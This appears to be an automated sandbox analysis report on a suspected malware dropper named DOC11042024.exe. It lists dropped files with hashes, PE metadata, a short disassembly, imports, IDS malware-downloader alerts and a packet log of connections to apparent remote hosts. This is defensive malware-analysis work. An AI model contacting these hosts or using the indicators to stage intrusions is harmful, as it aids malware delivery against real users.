SHA-512: | 086E7DD4D610AAE4B3042F90FCE3E16EFF7A6FA09FD7A161803BC536824B21D90AD160F8E861456C047838FC50CB81AA505B3671559E61D10817BFD7C6CCD758 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 314290 |
Entropy (8bit): | 2.3014083432260093 |
Encrypted: | false |
SSDEEP: | 1536:9nNjZMWsSaCpU9leJUsnVA71damwoZBV3TyKX50hVOBNopWlukDGzUnsTEaNjrDF:9NjZGSaCpbFzmBpyGmWlu0sQskXH/sRz |
MD5: | 0A673A90442585CF2385C436AA535E6F |
SHA1: | 211C84078F9E42B7A0196D942F70F306C786C286 |
SHA-256: | 31D1875B0180F5E0818102C734A69F61FB818D754077644C6E9A3B740C9592B1 |
SHA-512: | F571D9EB8BCCBC3CA2385F8B11E868DEBEF0A10E671219F62CB2A95558609CEDF552E76E618964F17204D745BEC49529B9D0F30FB6A6150D2C9AB5552E6D706F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 677344 |
Entropy (8bit): | 7.701041803336108 |
Encrypted: | false |
SSDEEP: | 12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm |
MD5: | 2119B4C15A036B7E407A7483A89ECDBF |
SHA1: | 37C3C28BBA3F2482E92B3B0EF570C2BA6F3167A8 |
SHA-256: | 66C79A5E56A0B28126534DED1E9DD50E2DE460FB671C49E7CF7A365568C7067B |
SHA-512: | 0DC2FBEC1EED5CDE2BF221C4B95A8CF232FCC922FF8B791CEF8B4E816F7BCCB1EE3C7B4510FC7AA78A74052DBD5694E1CE3ED55765BA8D1358529B9371829C0B |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 73172 |
Entropy (8bit): | 5.200798981640251 |
Encrypted: | false |
SSDEEP: | 1536:k4JKvd5jvoXs5AVOuLKr6LZ6hA08L083/Nkc4DYqT6+aPzHita:k4YHjv2JVOAKrxKz083/NCEqT6+aPzH3 |
MD5: | 8D96A572DD88752B194CA8CF3F1C042B |
SHA1: | DA71E31E2313456E2B29757609AF4C895BD8A4CF |
SHA-256: | 71100EDC195FBAEEB22FC562D5E99A1C36CAD69D8BBE3D446B44B041A8BB9208 |
SHA-512: | 8648847897D3895233D5C8C71FE911D2529917C6E3E817AAE589726B0979EC7F397C597CD8548C0F2996A70F012786FB7936B78DF70327913C3C82BE9C7D5FF2 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291130 |
Entropy (8bit): | 7.683492297887796 |
Encrypted: | false |
SSDEEP: | 6144:rTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr3D:cgsJ/z28+u5HC8jr3D |
MD5: | 106631F3FE8B1466CF81F6034D7D5B01 |
SHA1: | EFBF5BD218889AA0ECDCB1D99285F68F04DA0DAE |
SHA-256: | 6BAC90C8E5B6BA1851F4E18C1FD305B1826B7A726D2E00D2D2ECB9D68E0070E0 |
SHA-512: | 38A7AE0B34E536BCE3F00D988B03F04A3B06FD823B418FABED8A75E84E6DB24D7EDA712BCA31AF25E4B73C63E030CCE6A57111C871B72D0621378B8E55EF5ADF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\forsvarspolitiske.txt
Download File
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 555 |
Entropy (8bit): | 4.296685115633425 |
Encrypted: | false |
SSDEEP: | 12:ipTcM6gXrr+RfAo1YO9d0/0JaUEYi4gxMupNF6+y3Jv6quABQ7v2y:ilAuOfAjOUcJa/AdE6+mv6PABQ7vX |
MD5: | 05A5C3B4A770ACA6FC2F47CC40847FA5 |
SHA1: | 59E660F036F9CC982F01179F13348B498B9E924B |
SHA-256: | B12CD7400A5A2EE6E9BEF2994FD82B1650DD98C7238028E22B082C5D6AB87288 |
SHA-512: | 3F4A3D7D098EF0E8257C78EA00E2F51D1F6FD37AD73EF31D460D3B5B07E2688E40D1921A0DBBD5B9B10D1AF6D80B823D1EA615F13A8288B5957899CAE75D5396 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 203920 |
Entropy (8bit): | 2.2879778729381077 |
Encrypted: | false |
SSDEEP: | 1536:+xN56/s/mfDvxSumcvrZLyhKjXAvtXUcmXEWsCn/N:+LM/s/odTvrZWwcGn/N |
MD5: | 2AEF25928E999FB8C6A2C1E850974F3E |
SHA1: | 1CE656A158733656455170146DA1660926E4A4A9 |
SHA-256: | 936985B28A39966CD962AD8CD7DEDC0146DA1A2F19895C7F0DF638922282A3CD |
SHA-512: | 6A4AC11D6E3F97B2F1CCA65BE2DF6E5C5FAF97C92E31EBC6FD6FAF589D40A75E384FCFE7DBB0FAC2EA11BF950B9C0A8A956F587B1B61D4EC80EED2D33D35FE70 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.701041803336108 |
TrID: |
|
File name: | DOC11042024.exe |
File size: | 677'344 bytes |
MD5: | 2119b4c15a036b7e407a7483a89ecdbf |
SHA1: | 37c3c28bba3f2482e92b3b0ef570c2ba6f3167a8 |
SHA256: | 66c79a5e56a0b28126534ded1e9dd50e2de460fb671c49e7cf7a365568c7067b |
SHA512: | 0dc2fbec1eed5cde2bf221c4b95a8cf232fcc922ff8b791cef8b4e816f7bccb1ee3c7b4510fc7aa78a74052dbd5694e1ce3ed55765ba8d1358529b9371829c0b |
SSDEEP: | 12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm |
TLSH: | 53E40252A45450DBED7A57B16C3B4C5816A32E7EEDF0A40E669AB63113B33E3005BE0F |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L......Q.................`...*.......3.......p....@ |
Icon Hash: | 4f19194767674101 |
Entrypoint: | 0x40331c |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x51E3058B [Sun Jul 14 20:09:47 2013 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 17b7d61bda0f7478e36d9ce3d4170680 |
Signature Valid: | false |
Signature Issuer: | CN=fosterstilling, O=fosterstilling, L=Jackson, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | F01335F1BBCDDA054CFC73801B801AC7 |
Thumbprint SHA-1: | 20489A372C20054E55FCD8D377FB5209E1B97F81 |
Thumbprint SHA-256: | 79CCAB53CAE0477AF1C90C8B1B7BE5CC3A75B0A30AD5E35682FF4D51A262FD7E |
Serial: | 08E03876D97903A4BA903A213932262ED8F9D0D3 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+14h], ebp |
mov dword ptr [esp+10h], 00409230h |
mov dword ptr [esp+1Ch], ebp |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [004070BCh] |
push ebp |
call dword ptr [004072ACh] |
push 00000008h |
mov dword ptr [00429298h], eax |
call 00007F3FDCE0EC42h |
mov dword ptr [004291E4h], eax |
push ebp |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebp |
push 00420690h |
call dword ptr [0040717Ch] |
push 0040937Ch |
push 004281E0h |
call 00007F3FDCE0E8ADh |
call dword ptr [00407134h] |
mov ebx, 00434000h |
push eax |
push ebx |
call 00007F3FDCE0E89Bh |
push ebp |
call dword ptr [0040710Ch] |
cmp word ptr [00434000h], 0022h |
mov dword ptr [004291E0h], eax |
mov eax, ebx |
jne 00007F3FDCE0BD9Ah |
push 00000022h |
mov eax, 00434002h |
pop esi |
push esi |
push eax |
call 00007F3FDCE0E309h |
push eax |
call dword ptr [00407240h] |
mov dword ptr [esp+18h], eax |
jmp 00007F3FDCE0BE5Eh |
push 00000020h |
pop edx |
cmp cx, dx |
jne 00007F3FDCE0BD99h |
inc eax |
inc eax |
cmp word ptr [eax], dx |
je 00007F3FDCE0BD8Bh |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x271f8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa4cc8 | 0x918 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5e20 | 0x6000 | dd493ae9ebfb948f2a612edd72200a78 | False | 0.6545003255208334 | data | 6.407301589030798 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x1354 | 0x1400 | 8a134e15423272c853e24b49bfc8707f | False | 0.43046875 | data | 5.037834422880877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x202d8 | 0x600 | baf389fb3ef48369d3c1f90021fcff8b | False | 0.4733072916666667 | data | 3.7606720362000137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2a000 | 0x43000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x6d000 | 0x271f8 | 0x27200 | 1d37c42d5ee68a600bda4509cd11f047 | False | 0.49120781749201275 | data | 5.995617174533498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x6d2f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m | English | United States | 0.19167751094286054 |
RT_ICON | 0x7db20 | 0xe059 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9314853829679801 |
RT_ICON | 0x8bb80 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m | English | United States | 0.269189891355692 |
RT_ICON | 0x8fda8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m | English | United States | 0.29688796680497925 |
RT_ICON | 0x92350 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m | English | United States | 0.3599906191369606 |
RT_ICON | 0x933f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m | English | United States | 0.5186170212765957 |
RT_DIALOG | 0x93860 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x93960 | 0x11c | data | English | United States | 0.6091549295774648 |
RT_DIALOG | 0x93a80 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x93b48 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x93ba8 | 0x5a | data | English | United States | 0.7666666666666667 |
RT_VERSION | 0x93c08 | 0x2e4 | data | English | United States | 0.4418918918918919 |
RT_MANIFEST | 0x93ef0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
DLL | Import |
---|---|
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte |
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-04T07:13:21.664986+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49704 | TCP |
2024-11-04T07:13:37.121948+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49787 | 141.98.10.40 | 80 | TCP |
2024-11-04T07:13:40.417427+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP |
2024-11-04T07:13:41.823378+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP |
2024-11-04T07:13:42.525588+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49819 | 188.114.96.3 | 443 | TCP |
2024-11-04T07:13:43.417133+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49825 | 193.122.6.168 | 80 | TCP |
2024-11-04T07:13:44.137122+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49829 | 188.114.96.3 | 443 | TCP |
2024-11-04T07:13:49.154916+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49864 | 188.114.96.3 | 443 | TCP |
2024-11-04T07:13:52.375517+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49887 | 188.114.96.3 | 443 | TCP |
2024-11-04T07:14:01.197295+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49932 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 4, 2024 07:13:36.242943048 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:36.248636007 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:36.248702049 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:36.248771906 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:36.254301071 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121876001 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121886969 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121911049 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121918917 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121948004 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.121973038 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.121979952 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.122018099 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.122049093 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.122057915 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.122066975 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.122076988 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.122086048 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.122097015 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.122107983 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.122128010 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.128184080 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.128195047 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.128205061 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.128215075 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.128238916 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.128266096 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.128557920 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.128602028 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.258690119 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258702040 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258738041 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258745909 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.258776903 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.258781910 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258794069 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258831024 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.258857012 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258872986 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.258908987 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.259699106 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.259710073 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.259718895 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.259753942 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.259768009 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.260066986 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.260078907 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.260090113 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.260119915 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.260130882 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.260499954 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.260509014 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.260576010 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.260607958 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377482891 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377504110 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377536058 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377547026 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377577066 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377593040 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377605915 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377614975 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377616882 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377629995 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377635956 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377654076 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.377984047 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.377993107 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378035069 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.378125906 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378138065 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378148079 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378168106 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.378180981 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.378501892 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378513098 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378523111 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.378555059 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.378583908 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.395809889 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.395915031 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.395940065 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.395957947 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690093994 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690119028 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690129042 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690155983 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690176010 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690253973 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690264940 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690275908 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690285921 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690301895 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690304041 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
